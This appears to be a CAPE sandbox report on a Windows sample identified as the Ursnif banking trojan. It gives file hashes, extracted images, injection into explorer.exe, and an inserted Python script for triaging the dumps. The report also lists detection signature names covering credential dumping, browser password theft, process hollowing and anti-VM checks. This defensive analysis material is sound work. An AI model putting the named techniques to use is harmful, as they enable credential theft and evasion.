File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 76e9cdbcd85a16a4143d4208e5f3c677
SHA1 ffbed2aa712cebd432e96a5f5dc83ff5a20a2f1b
SHA256 b10811a223cd84180e3fbcfc24708da8bd32e19f4818834448d7f84ac63825c7
CRC32 0ECC3D70
Ssdeep 6:kK8XTxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:8TxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 eef8efa8e5ef5f312b25701da4157991
SHA1 cc881edcfd134733b17dcb79451f25f6161cba39
SHA256 ac01c65e45a11820480919a8a288a8e4372139ca9d6c01f86ec149527d2db613
CRC32 DD53C3A9
Ssdeep 6:kK8Xy81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:8y0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
File name Tar658B.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
File Size 144697 bytes
File Type data
MD5 c1dcbe728573780e2494bdad85364640
SHA1 4eb346a0ef16a5d82921369fb923134afdb6c2ce
SHA256 c308a174d279757b662c990a77b081af05cb4d7587d7e529764dd74013d62106
CRC32 7E692B86
Ssdeep 1536:w860v3gAurbFCLxR09oLRYpHdT20LrVY/jKQu8OXflvu:wvauuxR0aRYlEjKn8ofRu
ClamAV None
Yara None matched
CAPE Yara None matched
File name F0ACCF77CDCBFF39F6191887F6D2D357
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
File Size 1521 bytes
File Type data
MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
CRC32 53112384
Ssdeep 24:f5DuDD02FDuDD0xlGUCpMTlAXLOhT/g+vVp5cVQyPE5LTl79lazjY:hDuDD02FDuDD0xwUCylA7P+vVmQ6gR73
ClamAV None
Yara None matched
CAPE Yara None matched
File name F0ACCF77CDCBFF39F6191887F6D2D357
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
File Size 242 bytes
File Type data
MD5 a7317835e944073879671b7d76c83b1d
SHA1 687a2bdafd6f5b1bef2c836d951da57b87951d03
SHA256 a9e0dac20eeef177cd62a565af244b9b98f4dbe6d923c7fab07f2ab39c2ed6d0
CRC32 D5B31DA6
Ssdeep 3:kkFkl1llltfllXlE/wJlllH1jdClRRly+MlMJA3++oWctQQlvSGKlNLOl5ln:kKY/lHLB7WJAOXWcaQnK+7
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 e04a70c5d802348e5d7e07e65f9f4ec7
SHA1 922c08259cb91eb6b80dea3dad61ef64deb16cd2
SHA256 85b768e3d40787d6fbf54627e007d97c42ddcb0159fcfc753508b7111dfc5e9b
CRC32 3740B3B5
Ssdeep 6:kK9q81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:lq0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 6706253eeac75f7266ef388045bf5e95
SHA1 58b6d5435c1be76fde2d0139b4687197e171b075
SHA256 f55c2b7baf03da971c5af99be4c757a87c2180cecb0f432eb5183eecead5bf6e
CRC32 FFB63CF8
Ssdeep 6:kK281pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:+0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 4652649ebc5156c68c7f1eaf07416a02
SHA1 2fcc378e9991acaf5c69984bccaa87403bc145b0
SHA256 1af17240403860bbed03feaadfbd9cc9749bcda5db2d0acbf10fad2003539b60
CRC32 DF706C55
Ssdeep 6:kKq81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:C0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
Type Extracted Shellcode
Size 4096 bytes
Virtual Address 0x003C0000
Process LjejZswGjULF7Ng.exe
PID 420
Path C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
MD5 1019c3ba0f5e5e88fc1cb0bea1c937f2
SHA1 be416d9370c3ab787a8fef33e49f88fc25ff004c
SHA256 8096edd164ee431d520e4877e4f082aa355712d4f4e4337eb7bdc2bdb2937bdd
CRC32 A20A5D4B
Ssdeep 48:ZY+Ml2WkWfbH2lI3FEBoQvrV93I0OHnhQr:1TkylKmBoQvrrmBQ
Yara None matched
CAPE Yara None matched
Type Extracted PE Image: 32-bit executable
Size 35328 bytes
Virtual Address 0x00400000
Process LjejZswGjULF7Ng.exe
PID 420
Path C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
MD5 001911709a75fe5dca9c701b879e7123
SHA1 d2d0c26f689a728bedb626ce752574a2a6098035
SHA256 82780285b13630bf203567c6d18c94cccdd0d4bf1ba7642d1fdaa739b4c37113
CRC32 D62D17E7
Ssdeep 384:XCBghXkXDwajDr6MR4IBigtndg7C8goYwlIDfCelhSjlHJBLl+a0t8JzFImi4G71:yxxjTRHBig+dgoYwlGqr1Jn1VwZT
Yara None matched
CAPE Yara None matched
Type Extracted PE Image: 32-bit executable
Size 33280 bytes
Virtual Address 0x00400000
Process LjejZswGjULF7Ng.exe
PID 420
Path C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
MD5 f35205840f05fa2c58861b9dd29601b6
SHA1 98066dcfb06de63b65edc568f4ec6795e7f0e706
SHA256 9a9e31d3c83ae11f020cbf145bc2333e8e78d5737d26411639844f79b2bf4585
CRC32 ECF1B79B
Ssdeep 768:wxxjTRHBig+dgoYwlGqr1JnYd4it97iAa5:wxxT5gdTpGqr7n44y9Ja
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
CAPE Yara None matched
Type Ursnif Payload: 64-bit DLL
Size 249856 bytes
Virtual Address 0x0000000006C40000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 3fd0c02fde488b28eeb09ee1d92f459b
SHA1 545c01d116b7ab0b00dc4daa428b8b1984e7caed
SHA256 45d9602ca4dae7095394df0a2b88e3c92704fd1e1b20bb2a93bf2c37c821ba43
CRC32 28C669EB
Ssdeep 6144:bCb3PM7ntLwvLVqLfKyV4bqoJCDQWbjF:bCb3PmntMVqLCPqoJCDQWt
Yara None matched
CAPE Yara
  • Ursnif
  • Ursnif Payload
Type Extracted PE Image: 64-bit DLL
Size 1806848 bytes
Virtual Address 0x000007FEF6DA0000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 b225c11cfae0c76e1ef0bb22e7c37cdc
SHA1 4960748fa61f4e83b8b306c7a8fa2f51a1274198
SHA256 83f66b5faaaa1381be2c07380a2ebe8db3311abaa869d6840f19bc6c77bcf7aa
CRC32 848D3B55
Ssdeep 24576:YUjmNEa/Y8paA4fsFnj1uBT03g1VeSHerSTOw5iBX5zSsHc:YU6NdadgnUB4wPeSHeQtiBpzSs8
Yara None matched
CAPE Yara None matched
Type Extracted PE Image: 64-bit DLL
Size 10485775 bytes
Virtual Address 0x000007FEF6120000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 46e1284402392ad063d9b9eb42e960af
SHA1 d438e2a606214f7bad1222cd0aa81d1fa2ad3783
SHA256 6a8b61e38b94f178576d662e8bf66524cde01658d3dd3606f5923cf5b66285e5
CRC32 57AAFAF2
Ssdeep 196608:oYzQajSEXaOrbcub5vcwMU5oC1N1kFIEXYoI65Cuma9JmEa:zzQajSEXaOrbcub5vcwMUOC1rNo55ClN
Yara None matched
CAPE Yara None matched
Type Extracted PE Image: 64-bit DLL
Size 10489831 bytes
Virtual Address 0x000007FEF6120000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 84ac2e89002a0852e8db313dcde23834
SHA1 d07ba85b9de919baba6692e9a17b30a78ada8dba
SHA256 f2bd152886215bfe0c39ea2ae5ddd38d52ab7105749cf144a11980ea9bd71931
CRC32 C8A76E49
Ssdeep 196608:oYzQajSEXaOrbcub5vcwMU5oC1N1+FIEXYoI65Cuma9JmEq:zzQajSEXaOrbcub5vcwMUOC1rLo55Clt
Yara None matched
CAPE Yara None matched
Type Extracted PE Image: 64-bit DLL
Size 624640 bytes
Virtual Address 0x000007FEF57F0000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 4f6a3aad50ef2578896b3a450a05c33c
SHA1 2f4ed92f706a9ec715a7fa66948bd79fbf7ae2af
SHA256 65a723c6e8bd9a4fb5dd7f337c889fbefff1c3057bbea5770ed48265a5274371
CRC32 63D68719
Ssdeep 12288:SzmDjuFk4LJnqe4qRQhQePCdMgl6kf1TcE+ZokxtjxChq6FVsw:SzmDjuFkuJnqe4qRQhQePCd9l6kf/+Zi
Yara None matched
CAPE Yara None matched
Type Extracted PE Image: 64-bit DLL
Size 865280 bytes
Virtual Address 0x000007FEF5580000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 e4a13e5e2a1acd20e64043aca9a5fea5
SHA1 abc527e0c9c2193df9b347c488aaedd5897f919c
SHA256 1c6d2b9d60ffaea027e7041db074cd1bd3afb1b88b47c39e5939d4373970832f
CRC32 F036E9BC
Ssdeep 12288:24XQv1zi6YqutvfXpCOPV4o2To1nSJSkORC:24AxTYt5CW4o2TenSTO
Yara None matched
CAPE Yara None matched
Type Extracted PE Image: 64-bit DLL
Size 1275904 bytes
Virtual Address 0x000007FEF4220000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 b1dfe3778b43ab481926643f45cbbff3
SHA1 f98961951a7549a076ccd93a22522193a064f6db
SHA256 4ac9a73f2fe3590f043211c6d0f56088288d0758cf51a719668dfa114cdd30db
CRC32 0D2AAFB0
Ssdeep 12288:vAFzD/feVxzOVABewAV6vv4iT6kALKxNQAMUHHgq2G:6/WHzBcwAVe4E6rLUBF
Yara None matched
CAPE Yara None matched
Type Extracted PE Image: 64-bit DLL
Size 1316864 bytes
Virtual Address 0x000007FEF3690000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 eef0e521a042b06259dc3f3322ed238c
SHA1 f3a9976ad5e56c1d6095385e63e5fcc91f4f176b
SHA256 cdcc05faf0f55bd933ad366b58dfe0afce14aec6bffb012b4fecff1e7346e946
CRC32 5276A6BF
Ssdeep 24576:c/dp6BSMhM0gTcwD5LmdRmkD1wVzI5S/Spq5QG1C+5ETfFlTDRoxTDOloZPUH:c/uQ99DqEI5S/Spq5f1C+5ETfFlTmOlo
Yara None matched
CAPE Yara None matched
Type Extracted PE Image: 64-bit executable
Size 2861568 bytes
Virtual Address 0x0000000000000000
Process explorer.exe
PID 1632
Path C:\Windows\explorer.exe
MD5 33831b9c3cab910dfe1587366259edb1
SHA1 6479c2b08ae62ab2f55e53821c394c33b9240e89
SHA256 5cfd7a048ac8f6f305a5f2fa392c4bb22c76c8ca0fd238311d9f1b9068ea35a6
CRC32 27A507FC
Ssdeep 49152:kxrceI/lIRYraisQhFCUkvvYYYYYYYYYYYRYYYYYYYYYYE3iA7/eFUJN9ojoso2W:GrcPlIW8vYYYYYYYYYYYRYYYYYYYYYY4
Yara None matched
CAPE Yara None matched
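The extracted-image list above holds twelve dumps, and only one of them, the 64-bit DLL at 0x0000000006C40000 in explorer.exe, carries a CAPE Yara hit. As an added example (not code from this report or from the CAPE project), the script below parses records in the page's own key/value layout and ranks them for review: the CAPE-identified payload first, images that were rewritten in place at the same base (the two different dumps at 0x00400000 in PID 420) next, then 64-bit DLLs sitting in the address range where Windows 7 x64 maps system modules, which accounts for most of the explorer.exe dumps here, and everything else last. The excerpt embedded in the script is copied from this report and trimmed to the fields the parser reads; the address-range rule and the other ranking rules are assumptions of this example, not CAPE logic.

```python
"""Triage of the 'Extracted PE Image' records in a CAPE report.

Added example; not code from this report or from the CAPE project. The
excerpt below is copied from the report above and trimmed to the fields
the parser reads. The ranking rules in triage() are assumptions of this
example, not CAPE logic."""
import re
from collections import defaultdict

REPORT_EXCERPT = """\
Type Extracted Shellcode
Size 4096 bytes
Virtual Address 0x003C0000
PID 420
SHA256 8096edd164ee431d520e4877e4f082aa355712d4f4e4337eb7bdc2bdb2937bdd
Type Extracted PE Image: 32-bit executable
Size 35328 bytes
Virtual Address 0x00400000
PID 420
SHA256 82780285b13630bf203567c6d18c94cccdd0d4bf1ba7642d1fdaa739b4c37113
Type Extracted PE Image: 32-bit executable
Size 33280 bytes
Virtual Address 0x00400000
PID 420
SHA256 9a9e31d3c83ae11f020cbf145bc2333e8e78d5737d26411639844f79b2bf4585
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
Type Ursnif Payload: 64-bit DLL
Size 249856 bytes
Virtual Address 0x0000000006C40000
PID 1632
SHA256 45d9602ca4dae7095394df0a2b88e3c92704fd1e1b20bb2a93bf2c37c821ba43
CAPE Yara
  • Ursnif
  • Ursnif Payload
Type Extracted PE Image: 64-bit DLL
Size 1806848 bytes
Virtual Address 0x000007FEF6DA0000
PID 1632
SHA256 83f66b5faaaa1381be2c07380a2ebe8db3311abaa869d6840f19bc6c77bcf7aa
"""

# Assumption of this example: Windows 7 x64 maps most system DLLs into
# 0x000007FE00000000-0x000007FFFFFFFFFF, so a 64-bit DLL dumped from that
# range is most likely a loaded system module rather than injected code.
SYSTEM_DLL_RANGE = (0x000007FE00000000, 0x000007FFFFFFFFFF)


def _bullets(lines, key):
    """Rule names in the bullet lines directly under the line equal to key."""
    names = []
    for i, line in enumerate(lines):
        if line.strip() != key:
            continue
        for nxt in lines[i + 1:]:
            if not nxt.strip().startswith("•"):
                break
            names.append(nxt.strip().lstrip("• ").split(" - ")[0])
        break
    return names


def parse_dumps(text):
    """One dict per 'Type ...' record, in report order."""
    dumps = []
    for chunk in re.split(r"(?m)^(?=Type )", text):
        if not chunk.startswith("Type "):
            continue
        field = lambda name: re.search(rf"(?m)^{name} (.+)$", chunk).group(1)
        lines = chunk.splitlines()
        dumps.append({"type": field("Type"), "size": int(field("Size").split()[0]),
                      "va": int(field("Virtual Address"), 16), "pid": int(field("PID")),
                      "sha256": field("SHA256"), "yara": _bullets(lines, "Yara"),
                      "cape_yara": _bullets(lines, "CAPE Yara")})
    return dumps


def triage(text):
    """Bucket dumps: CAPE-identified payload, then images rewritten in place
    (same PID and base, different hash: an unpacking or hollowing stage),
    then probable system modules, then everything else."""
    dumps = parse_dumps(text)
    hashes_at_base = defaultdict(set)
    for d in dumps:
        hashes_at_base[(d["pid"], d["va"])].add(d["sha256"])
    buckets = {"payload": [], "rewritten_in_place": [],
               "likely_system_module": [], "other": []}
    lo, hi = SYSTEM_DLL_RANGE
    for d in dumps:
        if d["cape_yara"]:
            key = "payload"
        elif len(hashes_at_base[(d["pid"], d["va"])]) > 1:
            key = "rewritten_in_place"
        elif "64-bit DLL" in d["type"] and lo <= d["va"] <= hi:
            key = "likely_system_module"
        else:
            key = "other"
        buckets[key].append(d)
    return buckets
```

Calling `triage(REPORT_EXCERPT)` puts the 0x6C40000 DLL alone in the `payload` bucket, both 0x00400000 images in `rewritten_in_place`, the 0x7FEF6DA0000 DLL in `likely_system_module` and the 4096-byte shellcode region in `other`. The `yara` field is kept on each record so the `vmdetect` hit on the second 0x00400000 image stays attached to that specific unpacking stage rather than to the sample as a whole.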
Sorry! No process dumps.

Processing ( 38.538 seconds )

  • 35.599 CAPE
  • 1.69 BehaviorAnalysis
  • 0.628 Dropped
  • 0.222 Static
  • 0.166 TargetInfo
  • 0.095 TrID
  • 0.062 Deduplicate
  • 0.051 NetworkAnalysis
  • 0.019 Strings
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 1.029 seconds )

The figures below are per-signature evaluation times in seconds, not matches; a signature appearing in this list does not mean it fired on this sample.

  • 0.418 antidbg_windows
  • 0.057 decoy_document
  • 0.055 NewtWire Behavior
  • 0.054 api_spamming
  • 0.029 Doppelganging
  • 0.029 antiav_detectreg
  • 0.026 injection_createremotethread
  • 0.025 InjectionCreateRemoteThread
  • 0.023 antivm_vbox_window
  • 0.018 InjectionInterProcess
  • 0.018 antisandbox_script_timer
  • 0.016 injection_runpe
  • 0.016 InjectionProcessHollowing
  • 0.013 antivm_generic_disk
  • 0.012 injection_explorer
  • 0.011 infostealer_ftp
  • 0.01 mimics_filetime
  • 0.01 antivm_generic_scsi
  • 0.01 ransomware_files
  • 0.009 bootkit
  • 0.008 stealth_file
  • 0.008 antiemu_wine_func
  • 0.008 reads_self
  • 0.008 dynamic_function_loading
  • 0.008 virus
  • 0.007 malicious_dynamic_function_loading
  • 0.006 antivm_generic_services
  • 0.006 infostealer_browser_password
  • 0.006 kovter_behavior
  • 0.006 antianalysis_detectreg
  • 0.006 infostealer_im
  • 0.005 hancitor_behavior
  • 0.005 antiav_detectfile
  • 0.005 infostealer_mail
  • 0.005 ransomware_extensions
  • 0.004 exploit_getbasekerneladdress
  • 0.004 infostealer_bitcoin
  • 0.003 antidebug_guardpages
  • 0.003 recon_programs
  • 0.003 exploit_gethaldispatchtable
  • 0.003 persistence_autorun
  • 0.003 antivm_vbox_keys
  • 0.002 lsass_credential_dumping
  • 0.002 antivm_vbox_libs
  • 0.002 infostealer_browser
  • 0.002 EvilGrab
  • 0.002 shifu_behavior
  • 0.002 stealth_timeout
  • 0.002 antianalysis_detectfile
  • 0.002 antivm_vbox_files
  • 0.002 antivm_vmware_keys
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.002 masquerade_process_name
  • 0.001 tinba_behavior
  • 0.001 uac_bypass_eventvwr
  • 0.001 hawkeye_behavior
  • 0.001 sets_autoconfig_url
  • 0.001 rat_nanocore
  • 0.001 antiav_avast_libs
  • 0.001 exploit_heapspray
  • 0.001 stack_pivot
  • 0.001 Vidar Behavior
  • 0.001 betabot_behavior
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 ipc_namedpipe
  • 0.001 kibex_behavior
  • 0.001 exec_crash
  • 0.001 Raccoon Behavior
  • 0.001 cerber_behavior
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vpc_keys
  • 0.001 antivm_xen_keys
  • 0.001 ketrican_regkeys
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway
  • 0.001 recon_fingerprint

Reporting ( 0.018 seconds )

  • 0.018 CompressResults
Task ID 131468
Mongo ID 5e79d82e0986a12c9f6d5f1e
Cuckoo release 1.3-CAPE